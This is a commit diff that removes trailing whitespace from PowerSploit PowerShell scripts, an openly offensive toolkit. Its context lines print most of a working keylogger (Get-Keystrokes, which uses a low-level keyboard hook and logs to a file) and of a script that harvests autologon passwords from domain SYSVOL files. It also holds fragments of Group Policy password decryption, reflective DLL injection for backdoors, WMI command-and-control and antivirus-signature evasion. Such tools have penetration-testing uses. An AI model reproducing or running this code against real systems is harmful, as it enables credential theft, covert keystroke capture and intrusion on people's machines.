remove all trailing whitespaces in ps1 files

Author: AdrianVollmer

AntivirusBypass/Find-AVSignature.ps1

@@ -5,11 +5,11 @@ function Find-AVSignature
 
 Locate tiny AV signatures.
 
-PowerSploit Function: Find-AVSignature  
-Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)  
-License: BSD 3-Clause  
-Required Dependencies: None  
-Optional Dependencies: None  
+PowerSploit Function: Find-AVSignature
+Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
 .DESCRIPTION
 

CodeExecution/Invoke-ReflectivePEInjection.ps1

@@ -20,12 +20,12 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess
 from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
 remote process.
 
-PowerSploit Function: Invoke-ReflectivePEInjection  
-Author: Joe Bialek, Twitter: @JosephBialek  
-Code review and modifications: Matt Graeber, Twitter: @mattifestation  
-License: BSD 3-Clause  
-Required Dependencies: None  
-Optional Dependencies: None  
+PowerSploit Function: Invoke-ReflectivePEInjection
+Author: Joe Bialek, Twitter: @JosephBialek
+Code review and modifications: Matt Graeber, Twitter: @mattifestation
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
 .DESCRIPTION
 

CodeExecution/Invoke-WmiCommand.ps1

@@ -5,10 +5,10 @@ function Invoke-WmiCommand {
 Executes a PowerShell ScriptBlock on a target computer using WMI as a
 pure C2 channel.
 
-Author: Matthew Graeber  
-License: BSD 3-Clause  
-Required Dependencies: None  
-Optional Dependencies: None  
+Author: Matthew Graeber
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
 .DESCRIPTION
 

Exfiltration/Get-GPPAutologon.ps1

@@ -1,4 +1,4 @@
-function Get-GPPAutologon 
+function Get-GPPAutologon
 {
 <#
 .SYNOPSIS
@@ -11,25 +11,25 @@ function Get-GPPAutologon
     License: BSD 3-Clause
     Required Dependencies: None
     Optional Dependencies: None
- 
+
 .DESCRIPTION
 
     Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
 
 .EXAMPLE
 
     PS C:\> Get-GPPAutolgon
-    
-    UserNames                                    File                                         Passwords                                  
-    ---------                                    ----                                         ---------                                  
-    {administrator}                              \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}                    
-    {NormalUser}                                 \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}                    
+
+    UserNames                                    File                                         Passwords
+    ---------                                    ----                                         ---------
+    {administrator}                              \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
+    {NormalUser}                                 \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
 
 
 .EXAMPLE
 
     PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
-    
+
     password
     password12
     password123
@@ -39,46 +39,46 @@ function Get-GPPAutologon
     Recycling*3ftw!
 
 .LINK
-    
+
     https://support.microsoft.com/nb-no/kb/324737
 #>
-    
+
     [CmdletBinding()]
     Param ()
-    
+
     #Some XML issues between versions
     Set-StrictMode -Version 2
-    
+
     #define helper function to parse fields from xml files
-    function Get-GPPInnerFields 
+    function Get-GPPInnerFields
     {
     [CmdletBinding()]
         Param (
-            $File 
+            $File
         )
-    
-        try 
+
+        try
         {
             $Filename = Split-Path $File -Leaf
             [xml] $Xml = Get-Content ($File)
 
             #declare empty arrays
             $Password = @()
             $UserName = @()
-            
+
             #check for password and username field
             if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
             {
                 $props = $xml.GetElementsByTagName("Properties")
                 foreach($prop in $props)
                 {
-                    switch ($prop.name) 
+                    switch ($prop.name)
                     {
                         'DefaultPassword'
                         {
                             $Password += , $prop | Select-Object -ExpandProperty Value
                         }
-                    
+
                         'DefaultUsername'
                         {
                             $Username += , $prop | Select-Object -ExpandProperty Value
@@ -87,9 +87,9 @@ function Get-GPPAutologon
 
                     Write-Verbose "Potential password in $File"
                 }
-                         
+
                 #put [BLANK] in variables
-                if (!($Password)) 
+                if (!($Password))
                 {
                     $Password = '[BLANK]'
                 }
@@ -98,18 +98,18 @@ function Get-GPPAutologon
                 {
                     $UserName = '[BLANK]'
                 }
-                       
+
                 #Create custom object to output results
                 $ObjectProperties = @{'Passwords' = $Password;
                                       'UserNames' = $UserName;
                                       'File' = $File}
-                    
+
                 $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
                 Write-Verbose "The password is between {} and may be more than one value."
                 if ($ResultsObject)
                 {
                     Return $ResultsObject
-                } 
+                }
             }
         }
         catch {Write-Error $Error[0]}
@@ -120,15 +120,15 @@ function Get-GPPAutologon
         if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
             throw 'Machine is not a domain member or User is not a member of the domain.'
         }
-    
+
         #discover potential registry.xml containing autologon passwords
         Write-Verbose 'Searching the DC. This could take a while.'
         $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
-    
+
         if ( -not $XMlFiles ) {throw 'No preference files found.'}
 
         Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
-    
+
         foreach ($File in $XMLFiles) {
                 $Result = (Get-GppInnerFields $File.Fullname)
                 Write-Output $Result

Exfiltration/Get-GPPPassword.ps1

@@ -4,11 +4,11 @@ function Get-GPPPassword {
 
 Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
 
-PowerSploit Function: Get-GPPPassword  
-Author: Chris Campbell (@obscuresec)  
-License: BSD 3-Clause  
-Required Dependencies: None  
-Optional Dependencies: None  
+PowerSploit Function: Get-GPPPassword
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
 .DESCRIPTION
 
@@ -118,7 +118,7 @@ http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
             }
 
             $Base64Decoded = [Convert]::FromBase64String($Cpassword)
-            
+
             # Make sure System.Core is loaded
             [System.Reflection.Assembly]::LoadWithPartialName("System.Core") |Out-Null
 

Exfiltration/Get-Keystrokes.ps1

@@ -3,14 +3,14 @@ function Get-Keystrokes {
 .SYNOPSIS
 
     Logs keys pressed, time and the active window.
-    
+
     PowerSploit Function: Get-Keystrokes
     Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
     Revised By: Jesse Davis (@secabstraction)
     License: BSD 3-Clause
     Required Dependencies: None
     Optional Dependencies: None
-    
+
 .PARAMETER LogPath
 
     Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log.
@@ -30,14 +30,14 @@ function Get-Keystrokes {
 .EXAMPLE
 
     Get-Keystrokes -Timeout 20
-    
+
 .LINK
 
     http://www.obscuresec.com/
     http://www.exploit-monday.com/
     https://github.com/secabstraction
 #>
-    [CmdletBinding()] 
+    [CmdletBinding()]
     Param (
         [Parameter(Position = 0)]
         [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})]
@@ -67,11 +67,11 @@ function Get-Keystrokes {
         function local:Get-DelegateType {
             Param (
                 [OutputType([Type])]
-            
+
                 [Parameter( Position = 0)]
                 [Type[]]
                 $Parameters = (New-Object Type[](0)),
-            
+
                 [Parameter( Position = 1 )]
                 [Type]
                 $ReturnType = [Void]
@@ -86,17 +86,17 @@ function Get-Keystrokes {
             $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
             $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
             $MethodBuilder.SetImplementationFlags('Runtime, Managed')
-        
+
             $TypeBuilder.CreateType()
         }
         function local:Get-ProcAddress {
             Param (
                 [OutputType([IntPtr])]
-        
+
                 [Parameter( Position = 0, Mandatory = $True )]
                 [String]
                 $Module,
-            
+
                 [Parameter( Position = 1, Mandatory = $True )]
                 [String]
                 $Procedure
@@ -113,7 +113,7 @@ function Get-Keystrokes {
             $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
             $tmpPtr = New-Object IntPtr
             $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-        
+
             # Return the address of the function
             $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
         }
@@ -161,7 +161,7 @@ function Get-Keystrokes {
         $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
 	    $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
 	    $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
-    
+
         #endregion Imports
 
         $CallbackScript = {
@@ -177,12 +177,12 @@ function Get-Keystrokes {
             )
 
             $Keys = [Windows.Forms.Keys]
-        
+
             $MsgType = $wParam.ToInt32()
 
             # Process WM_KEYDOWN & WM_SYSKEYDOWN messages
             if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) {
-            
+
                 $hWindow = $GetForegroundWindow.Invoke()
 
                 $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey)
@@ -219,8 +219,8 @@ function Get-Keystrokes {
                         111 { $Key = "/" }
                     }
                 }
-                elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) {                      
-                    if ($Shift) {                           
+                elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) {
+                    if ($Shift) {
                         switch ($vKey.value__) { # Shiftable characters
                             48 { $Key = ')' }
                             49 { $Key = '!' }
@@ -245,7 +245,7 @@ function Get-Keystrokes {
                             222 { $Key = '<Double Quotes>' }
                         }
                     }
-                    else {                           
+                    else {
                         switch ($vKey.value__) {
                             48 { $Key = '0' }
                             49 { $Key = '1' }
@@ -285,7 +285,7 @@ function Get-Keystrokes {
                         $Keys::F10 { $Key = '<F10>' }
                         $Keys::F11 { $Key = '<F11>' }
                         $Keys::F12 { $Key = '<F12>' }
-			
+
                         $Keys::Snapshot    { $Key = '<Print Screen>' }
                         $Keys::Scroll      { $Key = '<Scroll Lock>' }
                         $Keys::Pause       { $Key = '<Pause/Break>' }
@@ -329,7 +329,7 @@ function Get-Keystrokes {
                 }
 
                 $obj = New-Object psobject -Property $Props
-            
+
                 # Stupid hack since Export-CSV doesn't have an append switch in PSv2
                 $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1]
 
@@ -342,14 +342,14 @@ function Get-Keystrokes {
         # Cast scriptblock as LowLevelKeyboardProc callback
         $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr])
         $Callback = $CallbackScript -as $Delegate
-    
+
         # Get handle to PowerShell for hook
         $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName
         $ModuleHandle = $GetModuleHandle.Invoke($PoshModule)
 
         # Set WM_KEYBOARD_LL hook
         $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0)
-    
+
         $Stopwatch = [Diagnostics.Stopwatch]::StartNew()
 
         while ($true) {
@@ -359,7 +359,7 @@ function Get-Keystrokes {
         }
 
         $Stopwatch.Stop()
-    
+
         # Remove the hook
         $UnhookWindowsHookEx.Invoke($Hook)
     }